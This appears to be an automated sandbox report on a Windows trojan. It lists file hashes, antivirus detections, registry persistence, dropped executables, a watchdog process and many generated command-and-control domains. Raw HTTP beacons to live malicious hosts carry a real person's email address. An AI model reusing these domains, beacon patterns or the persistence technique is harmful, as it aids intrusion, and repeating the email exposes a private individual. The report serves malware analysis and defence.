Analysis Date2015-07-29 20:35:25
MD5af3540c21fcb6bb3cddaa3741765e9d4
SHA1168108af3d467e178d5daa9ba81b66a56ca64d97

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 8638c9363fcd629afe64a986a9ffd012 sha1: 05d29f4c24959118b67ba3b846925b16a030b8b0 size: 298496
Section.rdata md5: 8892e4a00f3a3d69f5c738d6613d8b26 sha1: d530b59c3f8ddaef3758fa9aa89e7a856ba693cc size: 33280
Section.data md5: e2455f582d189ed13441a5477f98910b sha1: 071e8be38785830cd0de894af3142b0aac42e82e size: 98304
Timestamp2015-01-29 10:19:52
PackerMicrosoft Visual C++ ?.?
PEhash99376b4e1cb549e826c74b1b7cae745f7c9b3607
IMPhash717d6cb6080ca0c99dafe39893a72ecc
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. WebTrojan.DownLoader15.12413
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTSPY_NIVDORT.SMB
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusno_virus
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B2.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVK7no_virus
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Downloader-TLD [Trj]
AVAd-AwareGen:Variant.Symmi.22722
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAvira (antivir)BDS/Zegost.Gen4
AVMcafeeTrojan-FEMT!AF3540C21FCB
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Engine Encryption Auto-Discovery Client Logs ➝
C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.ftb
Creates FileC:\Documents and Settings\Administrator\Application Data\quswpooewx\awmbjeualt.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\quswpooewx\xxgyhfqbd.exe"

Network Details:

DNSsmokeinside.net
Type: A
50.63.202.34
DNSpartyexplain.net
Type: A
95.211.230.75
DNSpartybright.net
Type: A
50.63.202.44
DNSfreshexplain.net
Type: A
DNSexperienceexplain.net
Type: A
DNSfreshbright.net
Type: A
DNSexperiencebright.net
Type: A
DNSfreshinside.net
Type: A
DNSexperienceinside.net
Type: A
DNSgentlemaninstead.net
Type: A
DNSalreadyinstead.net
Type: A
DNSgentlemanexplain.net
Type: A
DNSalreadyexplain.net
Type: A
DNSgentlemanbright.net
Type: A
DNSalreadybright.net
Type: A
DNSgentlemaninside.net
Type: A
DNSalreadyinside.net
Type: A
DNSfollowinstead.net
Type: A
DNSmemberinstead.net
Type: A
DNSfollowexplain.net
Type: A
DNSmemberexplain.net
Type: A
DNSfollowbright.net
Type: A
DNSmemberbright.net
Type: A
DNSfollowinside.net
Type: A
DNSmemberinside.net
Type: A
DNSbegininstead.net
Type: A
DNSknowninstead.net
Type: A
DNSbeginexplain.net
Type: A
DNSknownexplain.net
Type: A
DNSbeginbright.net
Type: A
DNSknownbright.net
Type: A
DNSbegininside.net
Type: A
DNSknowninside.net
Type: A
DNSsummerinstead.net
Type: A
DNScrowdinstead.net
Type: A
DNSsummerexplain.net
Type: A
DNScrowdexplain.net
Type: A
DNSsummerbright.net
Type: A
DNScrowdbright.net
Type: A
DNSsummerinside.net
Type: A
DNScrowdinside.net
Type: A
DNSthoughtinstead.net
Type: A
DNSwaterinstead.net
Type: A
DNSthoughtexplain.net
Type: A
DNSwaterexplain.net
Type: A
DNSthoughtbright.net
Type: A
DNSwaterbright.net
Type: A
DNSthoughtinside.net
Type: A
DNSwaterinside.net
Type: A
DNSwomaninstead.net
Type: A
DNSsmokeinstead.net
Type: A
DNSwomanexplain.net
Type: A
DNSsmokeexplain.net
Type: A
DNSwomanbright.net
Type: A
DNSsmokebright.net
Type: A
DNSwomaninside.net
Type: A
DNSpartyinstead.net
Type: A
DNSfightinstead.net
Type: A
DNSfightexplain.net
Type: A
DNSfightbright.net
Type: A
DNSpartyinside.net
Type: A
DNSfightinside.net
Type: A
DNSfreshready.net
Type: A
DNSexperienceready.net
Type: A
DNSfreshbrown.net
Type: A
DNSexperiencebrown.net
Type: A
DNSfreshpeople.net
Type: A
DNSexperiencepeople.net
Type: A
DNSfreshdaughter.net
Type: A
DNSexperiencedaughter.net
Type: A
DNSgentlemanready.net
Type: A
DNSalreadyready.net
Type: A
DNSgentlemanbrown.net
Type: A
DNSalreadybrown.net
Type: A
DNSgentlemanpeople.net
Type: A
DNSalreadypeople.net
Type: A
DNSgentlemandaughter.net
Type: A
DNSalreadydaughter.net
Type: A
DNSfollowready.net
Type: A
DNSmemberready.net
Type: A
DNSfollowbrown.net
Type: A
DNSmemberbrown.net
Type: A
DNSfollowpeople.net
Type: A
DNSmemberpeople.net
Type: A
DNSfollowdaughter.net
Type: A
HTTP GEThttp://smokeinside.net/index.php?email=gheorghita.popa@primariacostinesti.ro&method=post&len
User-Agent:
HTTP GEThttp://partyexplain.net/index.php?email=gheorghita.popa@primariacostinesti.ro&method=post&len
User-Agent:
HTTP GEThttp://partybright.net/index.php?email=gheorghita.popa@primariacostinesti.ro&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 50.63.202.34:80
Flows TCP192.168.1.1:1032 ➝ 95.211.230.75:80
Flows TCP192.168.1.1:1033 ➝ 50.63.202.44:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676865 6f726768 6974612e   mail=gheorghita.
0x00000020 (00032)   706f7061 40707269 6d617269 61636f73   popa@primariacos
0x00000030 (00048)   74696e65 7374692e 726f266d 6574686f   tinesti.ro&metho
0x00000040 (00064)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000050 (00080)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000060 (00096)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000070 (00112)   6f73650d 0a486f73 743a2073 6d6f6b65   ose..Host: smoke
0x00000080 (00128)   696e7369 64652e6e 65740d0a 0d0a       inside.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676865 6f726768 6974612e   mail=gheorghita.
0x00000020 (00032)   706f7061 40707269 6d617269 61636f73   popa@primariacos
0x00000030 (00048)   74696e65 7374692e 726f266d 6574686f   tinesti.ro&metho
0x00000040 (00064)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000050 (00080)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000060 (00096)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000070 (00112)   6f73650d 0a486f73 743a2070 61727479   ose..Host: party
0x00000080 (00128)   6578706c 61696e2e 6e65740d 0a0d0a     explain.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d676865 6f726768 6974612e   mail=gheorghita.
0x00000020 (00032)   706f7061 40707269 6d617269 61636f73   popa@primariacos
0x00000030 (00048)   74696e65 7374692e 726f266d 6574686f   tinesti.ro&metho
0x00000040 (00064)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000050 (00080)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000060 (00096)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000070 (00112)   6f73650d 0a486f73 743a2070 61727479   ose..Host: party
0x00000080 (00128)   62726967 68742e6e 65740d0a 0d0a0a     bright.net.....


Strings